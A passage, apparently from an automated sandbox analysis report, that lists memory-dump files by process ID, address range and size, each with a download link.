                          428KB

                          Download
                        • memory/3412-660-0x0000000000000000-mapping.dmp
                          Download
                        • memory/3452-270-0x0000000000680000-0x0000000000685000-memory.dmp
                          Filesize

                          20KB

                          Download
                        • memory/3452-268-0x0000000000000000-mapping.dmp
                          Download
                        • memory/3452-271-0x00000000003F0000-0x00000000003F9000-memory.dmp
                          Filesize

                          36KB

                          Download
                        • memory/3588-153-0x0000000000000000-mapping.dmp
                          Download
                        • memory/3676-616-0x0000000000000000-mapping.dmp
                          Download
                        • memory/3972-116-0x0000000000030000-0x000000000003A000-memory.dmp
                          Filesize

                          40KB

                          Download
                        • memory/4016-132-0x0000000000400000-0x00000000004D8000-memory.dmp
                          Filesize

                          864KB

                          Download
                        • memory/4016-126-0x0000000000000000-mapping.dmp
                          Download
                        • memory/4088-670-0x0000000000000000-mapping.dmp
                          Download
                        • memory/4092-249-0x0000000000000000-mapping.dmp
                          Download
                        • memory/4092-261-0x0000000000330000-0x000000000033C000-memory.dmp
                          Filesize

                          48KB

                          Download
                        • memory/4092-260-0x0000000000340000-0x0000000000346000-memory.dmp
                          Filesize

                          24KB

                          Download
                        • memory/4124-662-0x0000000000000000-mapping.dmp
                          Download
                        • memory/4124-673-0x0000000004D90000-0x0000000004E2C000-memory.dmp
                          Filesize

                          624KB

                          Download
                        • memory/4168-596-0x0000000000000000-mapping.dmp
                          Download
                        • memory/4204-614-0x0000000000000000-mapping.dmp
                          Download
                        • memory/4312-540-0x000000000044003F-mapping.dmp
                          Download
                        • memory/4312-542-0x0000000000400000-0x0000000000495000-memory.dmp
                          Filesize

                          596KB

                          Download
                        • memory/4320-600-0x0000000000000000-mapping.dmp
                          Download
                        • memory/4416-618-0x0000000000000000-mapping.dmp
                          Download
                        • memory/4444-642-0x0000000000000000-mapping.dmp
                          Download
                        • memory/4460-608-0x0000000000000000-mapping.dmp
                          Download
                        • memory/4604-630-0x0000000000000000-mapping.dmp
                          Download
                        • memory/4640-543-0x0000000000000000-mapping.dmp
                          Download
                        • memory/4696-640-0x0000000000000000-mapping.dmp
                          Download
                        • memory/4700-549-0x0000000000000000-mapping.dmp
                          Download
                        • memory/4740-570-0x0000000005400000-0x00000000058FE000-memory.dmp
                          Filesize

                          5.0MB

                          Download
                        • memory/4740-553-0x0000000000000000-mapping.dmp
                          Download
                        • memory/4752-646-0x0000000000000000-mapping.dmp
                          Download
                        • memory/4784-654-0x0000000005410000-0x000000000590E000-memory.dmp
                          Filesize

                          5.0MB

                          Download
                        • memory/4784-648-0x000000000047B92E-mapping.dmp
                          Download
                        • memory/4792-628-0x000001BAE6E30000-0x000001BAE6E50000-memory.dmp
                          Filesize

                          128KB

                          Download
                        • memory/4792-629-0x000001BAE6E50000-0x000001BAE6E70000-memory.dmp
                          Filesize

                          128KB

                          Download
                        • memory/4792-591-0x000001BAE6E10000-0x000001BAE6E30000-memory.dmp
                          Filesize

                          128KB

                          Download
                        • memory/4792-578-0x00007FFBCDFD0000-0x00007FFBCDFD2000-memory.dmp
                          Filesize

                          8KB

                          Download
                        • memory/4792-559-0x0000000000000000-mapping.dmp
                          Download
                        • memory/4816-563-0x0000000000000000-mapping.dmp
                          Download
                        • memory/4888-572-0x0000000000000000-mapping.dmp
                          Download
                        • memory/4904-657-0x0000000000000000-mapping.dmp
                          Download
                        • memory/4916-655-0x0000000000000000-mapping.dmp
                          Download
                        • memory/4940-579-0x0000000000000000-mapping.dmp
                          Download
                        • memory/5076-583-0x0000000000000000-mapping.dmp
                          Download
                        • memory/5108-530-0x0000000000000000-mapping.dmp
                          Download
                        • memory/5116-592-0x0000000000000000-mapping.dmp
                          Download